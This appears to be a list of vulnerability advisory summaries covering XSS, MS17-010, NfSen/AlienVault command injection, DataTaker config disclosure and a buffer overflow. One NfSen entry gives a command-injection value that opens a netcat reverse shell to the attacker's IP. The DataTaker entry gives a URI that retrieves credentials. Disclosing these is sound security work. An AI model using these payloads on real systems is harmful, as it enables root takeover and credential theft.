The Sabai Discuss WordPress plugin is vulnerable to stored XSS. An attacker can exploit it by creating a new question on the website and inserting malicious XSS code into the title field. This allows the attacker to execute malicious code in the victim's browser.
XSS injection is possible via the Lync 2013 SDK and PowerShell. No user-interaction is required for the XSS to execute on the target machine. It will run regardless of whether or not they accept the message. The target only needs to be online. Additionally, by forcing a browse to a UNC path via the file URI it is possible to capture hashed user credentials for the current user.
The MS17-010 exploit for Windows 2000 and later by sleepya targets a vulnerability in the SMB protocol that allows attackers to gain access to a system. The exploit uses the same bug as EternalRomance and EternalSynergy, so a named pipe is needed. It has been tested on Windows 2016 x64, Windows 10 Pro Build 10240 x64, Windows 2012 R2 x64, Windows 8.1 x64, Windows 2008 R2 SP1 x64, Windows 7 SP1 x64, Windows 2008 SP1 x64, Windows 2003 R2 SP2 x64, Windows XP SP2 x64, Windows 8.1 x86, Windows 7 SP1 x86, Windows 2008 SP1 x86, Windows 2003 SP2 x86, Windows XP SP3 x86, and Windows 2000 SP4 x86.
A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request with shell commands, which will be executed as root on a vulnerable system. The injection is covered by CVE-2017-7175, and the commands are executed as root due to CVE-2017-6972. For a reverse shell to the attacking machine 10.100.1.2, on the NfSen / AlienVault netflow processing web page, enter the following into the 'Custom output format:' input box: '; nc -ne /bin/bash 10.100.1.2 443 # If nc is not installed on the target, alternative ways of leveraging the vulnerability are likely to be possible.
DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations.
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
Pelco cameras suffer from multiple DOM-based, stored and reflected XSS vulnerabilities: input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request containing control characters and shell commands which will be executed as root on a vulnerable system.
The web user (in AlienVault USM, www-data) has access to the NfSen IPC UNIX domain socket. This can be used to send a crafted command (complete with shell metacharacter injection) to the NfSen Perl components, causing OS command injection in a root privilege context, and can therefore be leveraged for privilege escalation from the web user to full root privileges.
Easy File Sharing Web Server 7.2 is vulnerable to a buffer overflow when handling a specially crafted GET request. This can be exploited to bypass DEP and execute arbitrary code by using a ROP chain.